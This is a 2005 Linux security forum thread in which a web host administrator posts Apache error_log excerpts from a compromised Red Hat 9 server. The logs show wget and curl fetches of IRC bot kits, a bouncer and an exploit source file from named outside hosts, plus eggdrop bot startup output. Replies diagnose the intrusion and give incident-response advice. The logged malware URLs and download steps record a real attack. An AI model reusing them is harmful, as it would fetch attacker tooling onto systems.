Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
| Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
 |
11-14-2005, 12:36 AM
|
#1
|
|
Member
Registered: Oct 2003
Location: Nebraska
Distribution: SuSE 9.0, Redhat 9.0
Posts: 41
Rep: 
|
Am I in trouble?? Is this an attack or exploit?
We are running a webserver with RedHat 9.0 using Apache 2. We download a .tar file to a remote computer every week and it has all of the backup files in it for the websites that we host. This week, when that remote computer did a Norton virus scan, it found 2 viruses in the backup tar file:
Hacktool.Rootkit
&
Linux.Jac.8759
They were hidden in a directory named ...
(The directory name was 3 dots, effectively making it hidden. The people who own the website account don't even use it, so I am almost 100% sure that this was not something they FTP'ed into it. It was under the public_html tree, so it was accessable with FTP (and apache). The account belongs to a local business, so I am sure that it wasn't anybody there that uploaded this.
These viruses were found in 2 tar files that resided in this ... directory. They were eggz.tar and psy.tgz.tgz. I thought that, no matter how they got there, if I just delete them, no harm done.
Then, I got to looking in the Apache error_log and this is what I found:
Code:
--00:42:44-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.1'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 73.53 KB/s
50K .......... .......... .......... .......... .......... 11% 168.35 KB/s
100K .......... .......... .......... .......... .......... 17% 163.40 KB/s
150K .......... .......... .......... .......... .......... 23% 168.35 KB/s
200K .......... .......... .......... .......... .......... 29% 148.81 KB/s
250K .......... .......... .......... .......... .......... 35% 163.93 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 141.64 KB/s
400K .......... .......... .......... .......... .......... 53% 157.23 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 168.35 KB/s
550K .......... .......... .......... .......... .......... 71% 163.40 KB/s
600K .......... .......... .......... .......... .......... 77% 122.55 KB/s
650K .......... .......... .......... .......... .......... 83% 151.06 KB/s
700K .......... .......... .......... .......... .......... 89% 155.28 KB/s
750K .......... .......... .......... .......... .......... 95% 154.80 KB/s
800K .......... .......... .......... .... 100% 151.91 KB/s
00:42:50 (146.40 KB/s) - `eggmbonx.tar.gz.1' saved [854356/854356]
--00:43:16-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.2'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 83.33 KB/s
50K .......... .......... .......... .......... .......... 11% 168.35 KB/s
100K .......... .......... .......... .......... .......... 17% 163.40 KB/s
150K .......... .......... .......... .......... .......... 23% 168.92 KB/s
200K .......... .......... .......... .......... .......... 29% 168.35 KB/s
250K .......... .......... .......... .......... .......... 35% 152.44 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 141.64 KB/s
400K .......... .......... .......... .......... .......... 53% 157.23 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 112.87 KB/s
550K .......... .......... .......... .......... .......... 71% 138.89 KB/s
600K .......... .......... .......... .......... .......... 77% 163.40 KB/s
650K .......... .......... .......... .......... .......... 83% 158.73 KB/s
700K .......... .......... .......... .......... .......... 89% 166.11 KB/s
750K .......... .......... .......... .......... .......... 95% 168.35 KB/s
800K .......... .......... .......... .... 100% 161.94 KB/s
00:43:22 (148.38 KB/s) - `eggmbonx.tar.gz.2' saved [854356/854356]
--00:44:37-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.3'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 73.64 KB/s
50K .......... .......... .......... .......... .......... 11% 167.79 KB/s
100K .......... .......... .......... .......... .......... 17% 148.81 KB/s
150K .......... .......... .......... .......... .......... 23% 168.92 KB/s
200K .......... .......... .......... .......... .......... 29% 167.22 KB/s
250K .......... .......... .......... .......... .......... 35% 164.47 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 167.79 KB/s
400K .......... .......... .......... .......... .......... 53% 164.47 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 168.35 KB/s
550K .......... .......... .......... .......... .......... 71% 163.93 KB/s
600K .......... .......... .......... .......... .......... 77% 168.35 KB/s
650K .......... .......... .......... .......... .......... 83% 163.40 KB/s
700K .......... .......... .......... .......... .......... 89% 167.79 KB/s
750K .......... .......... .......... .......... .......... 95% 168.92 KB/s
800K .......... .......... .......... .... 100% 168.29 KB/s
00:44:43 (154.19 KB/s) - `eggmbonx.tar.gz.3' saved [854356/854356]
--00:45:26-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.4'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 74.07 KB/s
50K .......... .......... .......... .......... .......... 11% 168.35 KB/s
100K .......... .......... .......... .......... .......... 17% 164.47 KB/s
150K .......... .......... .......... .......... .......... 23% 167.79 KB/s
200K .......... .......... .......... .......... .......... 29% 168.35 KB/s
250K .......... .......... .......... .......... .......... 35% 163.93 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 168.35 KB/s
400K .......... .......... .......... .......... .......... 53% 163.93 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 167.79 KB/s
550K .......... .......... .......... .......... .......... 71% 163.93 KB/s
600K .......... .......... .......... .......... .......... 77% 168.92 KB/s
650K .......... .......... .......... .......... .......... 83% 162.87 KB/s
700K .......... .......... .......... .......... .......... 89% 168.92 KB/s
750K .......... .......... .......... .......... .......... 95% 166.11 KB/s
800K .......... .......... .......... .... 100% 132.56 KB/s
00:45:31 (153.54 KB/s) - `eggmbonx.tar.gz.4' saved [854356/854356]
curl: (6) Couldn't resolve host 'eggmbonx.tar.gz'
% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed
^M 0 834k 0 0 0 0 0 0 --:--:-- 0:00:00 --:--:-- 0^M 5 834k 5 49232 0 0 38949 0 0:00:21 0:00:01 0:00:20 72613^M 25 834k 25 214k 0 0 97172 0 0:00:08 0:00:02 0:00:06 128k^M 45 834k 45 381k 0 0 116k 0 0:00:07 0:00:03 0:00:04 142k^M 64 834k 64 541k 0 0 127k 0 0:00:06 0:00:04 0:00:02 147k^M 84 834k 84 701k 0 0 133k 0 0:00:06 0:00:05 0:00:01 149k^M100 834k 100 834k 0 0 134k 0 0:00:06 0:00:06 0:00:00 159k
Code:
--05:21:54-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.2'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.47]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 141.64 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:21:55 (157.19 KB/s) - `psy.tar.gz.2' saved [141323/141323]
--05:22:56-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.3'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.46]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 140.85 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:22:57 (156.83 KB/s) - `psy.tar.gz.3' saved [141323/141323]
--05:23:35-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.4'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.45]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 141.24 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:23:36 (157.01 KB/s) - `psy.tar.gz.4' saved [141323/141323]
--05:25:12-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.5'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.44]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 140.85 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 171.22 KB/s
05:25:14 (156.47 KB/s) - `psy.tar.gz.5' saved [141323/141323]
--05:25:57-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.6'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.47]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 141.24 KB/s
50K .......... .......... .......... .......... .......... 72% 163.40 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:25:58 (156.83 KB/s) - `psy.tar.gz.6' saved [141323/141323]
Code:
mkdir: cannot create directory `...': Permission denied
--07:38:06-- http://geocities.com/kostputri/botz/eggz.tgz
=> `eggz.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,357,407 [application/x-compressed]
0K .......... .......... .......... .......... .......... 3% 132.98 KB/s
50K .......... .......... .......... .......... .......... 7% 163.40 KB/s
100K .......... .......... .......... .......... .......... 11% 168.35 KB/s
150K .......... .......... .......... .......... .......... 15% 169.49 KB/s
200K .......... .......... .......... .......... .......... 18% 162.87 KB/s
250K .......... .......... .......... .......... .......... 22% 168.35 KB/s
300K .......... .......... .......... .......... .......... 26% 168.92 KB/s
350K .......... .......... .......... .......... .......... 30% 163.40 KB/s
400K .......... .......... .......... .......... .......... 33% 79.74 KB/s
450K .......... .......... .......... .......... .......... 37% 48.83 MB/s
500K .......... .......... .......... .......... .......... 41% 75.87 KB/s
550K .......... .......... .......... .......... .......... 45% 168.92 KB/s
600K .......... .......... .......... .......... .......... 49% 167.79 KB/s
650K .......... .......... .......... .......... .......... 52% 163.93 KB/s
700K .......... .......... .......... .......... .......... 56% 168.35 KB/s
750K .......... .......... .......... .......... .......... 60% 164.47 KB/s
800K .......... .......... .......... .......... .......... 64% 167.22 KB/s
850K .......... .......... .......... .......... .......... 67% 168.35 KB/s
900K .......... .......... .......... .......... .......... 71% 164.47 KB/s
950K .......... .......... .......... .......... .......... 75% 167.79 KB/s
1000K .......... .......... .......... .......... .......... 79% 168.92 KB/s
1050K .......... .......... .......... .......... .......... 82% 163.93 KB/s
1100K .......... .......... .......... .......... .......... 86% 167.79 KB/s
1150K .......... .......... .......... .......... .......... 90% 168.35 KB/s
1200K .......... .......... .......... .......... .......... 94% 163.93 KB/s
1250K .......... .......... .......... .......... .......... 98% 168.35 KB/s
1300K .......... .......... ..... 100% 169.49 KB/s
07:38:15 (157.55 KB/s) - `eggz.tgz' saved [1357407/1357407]
--07:42:45-- http://geocities.com/kostputri/botz/netgate.tgz
=> `netgate.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338,976 [application/x-compressed]
0K .......... .......... .......... .......... .......... 15% 130.89 KB/s
50K .......... .......... .......... .......... .......... 30% 163.40 KB/s
100K .......... .......... .......... .......... .......... 45% 168.35 KB/s
150K .......... .......... .......... .......... .......... 60% 168.92 KB/s
200K .......... .......... .......... .......... .......... 75% 163.40 KB/s
250K .......... .......... .......... .......... .......... 90% 167.79 KB/s
300K .......... .......... .......... . 100% 172.40 KB/s
07:42:47 (160.31 KB/s) - `netgate.tgz' saved [338976/338976]
--07:56:01-- http://geocities.com/kostputri/botz/netgate.tgz
=> `netgate.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338,976 [application/octet-stream]
0K .......... .......... .......... .......... .......... 15% 132.98 KB/s
50K .......... .......... .......... .......... .......... 30% 162.87 KB/s
100K .......... .......... .......... .......... .......... 45% 168.35 KB/s
150K .......... .......... .......... .......... .......... 60% 168.92 KB/s
200K .......... .......... .......... .......... .......... 75% 163.93 KB/s
250K .......... .......... .......... .......... .......... 90% 167.79 KB/s
300K .......... .......... .......... . 100% 171.44 KB/s
07:56:03 (160.69 KB/s) - `netgate.tgz' saved [338976/338976]
[08:10] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:10] Listening at telnet port 4000 (all)
[08:10] Module loaded: transfer (with lang support)
[08:10] Module loaded: channels
[08:10] Module loaded: server
[08:10] Module loaded: ctcp
[08:10] Module loaded: irc
[08:10] Module loaded: share
[08:10] Module loaded: filesys (with lang support)
[08:10] Module loaded: notes (with lang support)
[08:10] Module loaded: console (with lang support)
[08:10] Module loaded: blowfish
[08:10] Module loaded: assoc (with lang support)
[08:10] Module loaded: wire (with lang support)
[08:10] ===============================
[08:10] NeTgaTE 9.2 LoadEd
[08:10] Reported any bugs to #NeTgaTE
[08:10] Question Go To #NeTgaTE-HeLp
[08:10] Email: admin@netgatetcl.cjb.net
[08:10] ===============================
[08:10] Creating channel file
[08:10] === Angelica: 0 channels, 0 users.
[08:22] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:22] Listening at telnet port 4000 (all)
[08:22] Module loaded: transfer (with lang support)
[08:22] Module loaded: channels
[08:22] Module loaded: server
[08:22] Module loaded: ctcp
[08:22] Module loaded: irc
[08:22] Module loaded: share
[08:22] Module loaded: filesys (with lang support)
[08:22] Module loaded: notes (with lang support)
[08:22] Module loaded: console (with lang support)
[08:22] Module loaded: blowfish
[08:22] Module loaded: assoc (with lang support)
[08:22] Module loaded: wire (with lang support)
[08:22] ===============================
[08:22] NeTgaTE 9.2 LoadEd
[08:22] Reported any bugs to #NeTgaTE
[08:22] Question Go To #NeTgaTE-HeLp
[08:22] Email: admin@netgatetcl.cjb.net
[08:22] ===============================
[08:22] Userfile loaded, unpacking...
[08:22] === Angelica: 2 channels, 5 users.
[08:25] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:25] Listening at telnet port 4001 (all)
[08:25] Module loaded: transfer (with lang support)
[08:25] Module loaded: channels
[08:25] Module loaded: server
[08:25] Module loaded: ctcp
[08:25] Module loaded: irc
[08:25] Module loaded: share
[08:25] Module loaded: filesys (with lang support)
[08:25] Module loaded: notes (with lang support)
[08:25] Module loaded: console (with lang support)
[08:25] Module loaded: blowfish
[08:25] Module loaded: assoc (with lang support)
[08:25] Module loaded: wire (with lang support)
[08:25] ===============================
[08:25] NeTgaTE 9.2 LoadEd
[08:25] Reported any bugs to #NeTgaTE
[08:25] Question Go To #NeTgaTE-HeLp
[08:25] Email: admin@netgatetcl.cjb.net
[08:25] ===============================
[08:25] Userfile loaded, unpacking...
[08:25] === Angelica: 2 channels, 5 users.
--08:41:42-- http://geocities.com/kostputri/pzy/psy.tgz.tgz
=> `psy.tgz.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 424,644 [application/x-compressed]
0K .......... .......... .......... .......... .......... 12% 132.28 KB/s
50K .......... .......... .......... .......... .......... 24% 163.40 KB/s
100K .......... .......... .......... .......... .......... 36% 168.35 KB/s
150K .......... .......... .......... .......... .......... 48% 168.35 KB/s
200K .......... .......... .......... .......... .......... 60% 163.93 KB/s
250K .......... .......... .......... .......... .......... 72% 168.35 KB/s
300K .......... .......... .......... .......... .......... 84% 168.35 KB/s
350K .......... .......... .......... .......... .......... 96% 163.93 KB/s
400K .......... .... 100% 179.16 KB/s
08:41:45 (161.74 KB/s) - `psy.tgz.tgz' saved [424644/424644]
--08:42:55-- http://geocities.com/kostputri/botz/netgate.tgz
=> `netgate.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338,976 [application/x-compressed]
0K .......... .......... .......... .......... .......... 15% 132.63 KB/s
50K .......... .......... .......... .......... .......... 30% 163.40 KB/s
100K .......... .......... .......... .......... .......... 45% 168.35 KB/s
150K .......... .......... .......... .......... .......... 60% 168.92 KB/s
200K .......... .......... .......... .......... .......... 75% 163.40 KB/s
250K .......... .......... .......... .......... .......... 90% 168.35 KB/s
300K .......... .......... .......... . 100% 171.44 KB/s
08:42:57 (160.69 KB/s) - `netgate.tgz' saved [338976/338976]
[08:46] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:46] Listening at telnet port 4000 (all)
[08:46] Module loaded: transfer (with lang support)
[08:46] Module loaded: channels
[08:46] Module loaded: server
[08:46] Module loaded: ctcp
[08:46] Module loaded: irc
[08:46] Module loaded: share
[08:46] Module loaded: filesys (with lang support)
[08:46] Module loaded: notes (with lang support)
[08:46] Module loaded: console (with lang support)
[08:46] Module loaded: blowfish
[08:46] Module loaded: assoc (with lang support)
[08:46] Module loaded: wire (with lang support)
[08:46] ===============================
[08:46] NeTgaTE 9.2 LoadEd
[08:46] Reported any bugs to #NeTgaTE
[08:46] Question Go To #NeTgaTE-HeLp
[08:46] Email: admin@netgatetcl.cjb.net
[08:46] ===============================
[08:46] Userfile loaded, unpacking...
[08:46] === Angelica: 2 channels, 5 users.
mkdir: cannot create directory `leech': Permission denied
chmod: failed to get attributes of `leech': No such file or directory
ls: .: Permission denied
ls: .: Permission denied
There are many more of these entries there, but you get the idea. That last one particularly worries me, because I did not install eggdrop, nor did I even know what eggdrop was until I just googled it. (IRC Bot). Why are these wget outputs in the APACHE error_log??? What has happened?? Is this bad? What should I do??
Here are the results of "nmap -sT localhost":
Code:
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on localhost.localdomain (127.0.0.1):
(The 1587 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop-3
111/tcp open sunrpc
143/tcp open imap2
443/tcp open https
783/tcp open hp-alarm-mgr
953/tcp open rndc
3306/tcp open mysql
6000/tcp open X11
10000/tcp open snet-sensor-mgmt
Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds
I should have paid more attention before, but I am almost certain that all of these ports weren't open before. The ones that look suspicious to me are 111, 783, and 953. I know for a fact that we are not using anything on these ports. We use the others.
Louie |
|
|
|
|
11-14-2005, 12:37 AM
|
#2
|
|
Member
Registered: Oct 2003
Location: Nebraska
Distribution: SuSE 9.0, Redhat 9.0
Posts: 41
Original Poster
Rep:
|
Here are a few more that were in there. I was going to post them above, but it said my post was too long.
Code:
--10:52:32-- http://freewebs.com/datax/psy.tar.gz
=> `psy.tar.gz.2'
Resolving freewebs.com... done.
Connecting to freewebs.com[38.119.100.16]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,213 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 131.93 KB/s
50K .......... .......... .......... .......... .......... 72% 168.35 KB/s
100K .......... .......... .......... ....... 100% 166.97 KB/s
10:52:33 (152.72 KB/s) - `psy.tar.gz.2' saved [141213/141213]
--10:54:24-- http://freewebs.com/datax/psy.tar.gz
=> `psy.tar.gz.3'
Resolving freewebs.com... done.
Connecting to freewebs.com[38.119.100.15]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,213 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 86.36 KB/s
50K .......... .......... .......... .......... .......... 72% 490.20 KB/s
100K .......... .......... .......... ....... 100% 166.24 KB/s
10:54:25 (151.71 KB/s) - `psy.tar.gz.3' saved [141213/141213]
Code:
--04:26:14-- http://wawanhack.t35.com/tool/tembak.c
=> `tembak.c'
Resolving wawanhack.t35.com... done.
Connecting to wawanhack.t35.com[66.45.237.211]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://freehostcp.t35.com/404b.html [following]
--04:26:14-- http://freehostcp.t35.com/404b.html
=> `404b.html.1'
Resolving freehostcp.t35.com... done.
Connecting to freehostcp.t35.com[66.45.237.214]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 943 [text/html]
0K 100% 920.90 KB/s
04:26:14 (920.90 KB/s) - `404b.html.1' saved [943/943]
Louie |
|
|
|
|
11-14-2005, 02:16 AM
|
#3
|
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
Looks like typical cracker irc stuff...eggdrop..psybnc
It appears pretty clear that you were cracked, so taking the system offline, doing a full format and re-installation from trusted media is an absolute requirement for you to ever be able to trust the system. It's likely that the viruses were uploaded onto the system as part of an infected cracking tool. Not that surprising given that a significant portion of public cracking tools are infected.
I'd recommend taking a listing of all the processes as well as the contents of /proc (just make a compressed tar archive), take a listing of network connections using lsof -i or netstat and then take the system offline. If you wish to do forensic analysis of the system, you can make an image of the compromised drive and perform your analysis on that.
As far as how the system was compromised, what services were you running? Were you keeping the system updated? If you were running a website, what type of content was on it, static pages or dynamic stuff like CGI or PHP? Any of the usual suspects like phpBB or AWStats? Did you use a reasonable password policy?
Last edited by Capt_Caveman; 11-14-2005 at 02:17 AM.
|
|
|
|
|
11-14-2005, 11:32 AM
|
#4
|
|
Member
Registered: Oct 2003
Location: Nebraska
Distribution: SuSE 9.0, Redhat 9.0
Posts: 41
Original Poster
Rep:
|
Thanks for the response!
I am a relative newbie to Linux and I know next to nothing about "cracking", so could you explain a little deeper??
When you said "typical cracker irc stuff", what did you mean by that. Is this common?? And when you say "infectred cracking tool", do you mean the person using the tool was just trying to crack in, but since it was infected, it also created viruses on the machine??
As far as how the system was compromised, the ... hidden directory was found inside the directory tree of a PHP statistics program that we install for all of our websites. It is called BBClone ( www.bbclone.de). Could it have been a security flaw in this that made it possible for this to happen?? If so, I will have to uninstall it from all websites.
Louie |
|
|
|
|
11-14-2005, 11:50 AM
|
#5
|
|
LQ Guru
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 11,354
|
Well, basically, "cracking" in this case refers to someone, unknown to you, installed a program on the computer and ran it. This means that they were necessarily able to log-on to it... they "cracked" system security. And they probably used the computer to relay Chat (IRC) traffic, perhaps "among other things."
What you have to do now is to remove the computer from the Internet, scrub it completely clean, and re-install everything from known-good sources. Then, en futuro, pay closer attention to security warnings and admonitions.
|
|
|
|
|
11-14-2005, 11:54 AM
|
#6
|
|
Member
Registered: Oct 2003
Location: Nebraska
Distribution: SuSE 9.0, Redhat 9.0
Posts: 41
Original Poster
Rep:
|
Yes, I am planning a complete reinstall. Thanks for the help.
One more thing, do the ports 111, 783, and 953 being open sound like they could be part of this. Do they have anything to do with IRC?? Because I almost sure that these ports were not open before.
Louie
|
|
|
|
|
11-14-2005, 10:33 PM
|
#7
|
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
I am a relative newbie to Linux and I know next to nothing about "cracking", so could you explain a little deeper??
Cracker ...commonly called hacker... aka someone who has broken into your system.
When you said "typical cracker irc stuff", what did you mean by that. Is this common??
Common IRC tools uploaded by a cracker onto a newly compromised machine. Things like IRC bots and bouncers.
And when you say "infectred cracking tool", do you mean the person using the tool was just trying to crack in, but since it was infected, it also created viruses on the machine??
Once someone has gained access to your machine, one of the first steps often taken is to upload a variety utilities. Sometimes this includes network daemons (backdoors) so that they can access the system again, tools for performing local priviledge elevation (aka root exploits), trojaned binaries and rootkits for hiding the presence/activity/files of the attacker, or simply things like irc bots. Very often these tools are infected with various linux viruses; in fact they're probably one of the most common sources of linux viruses in the wild. When the attacker compromises your system and uploads the infected file, your filesystem often gets infected as well.
As far as how the system was compromised, the ... hidden directory was found inside the directory tree of a PHP statistics program that we install for all of our websites. It is called BBClone (www.bbclone.de). Could it have been a security flaw in this that made it possible for this to happen??
I can't really find anything about recent vulnerabilities however it seems like it hasn't been maintained for some time. So I would be concerned about it, especially give the number of PHP and bulletin-board related vulnerabilities over the last year. You might want to consider switching to something that's more actively maintained (though AWStats has had a less than stellar history lately  ). The
I also just noticed that you are running Redhat 9. How have you been keeping it updated/patched?
One more thing, do the ports 111, 783, and 953 being open sound like they could be part of this. Do they have anything to do with IRC?? Because I almost sure that these ports were not open before.
Not normally. Running "lsof -i" or "netstat -pantu" might help to figure out exactly what is listening on those ports. Both of those commands should output a PID number. Take that number and look up the binary in /proc/PID#/cmdline. If those ports were opened by the attacker, then that would indicate a full compromise as normal uses shouldn't be able to bind ports under 1024.
|
|
|
|
All times are GMT -5. The time now is 05:36 PM.
|
|
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
|
 Latest Threads
LQ News
|
|
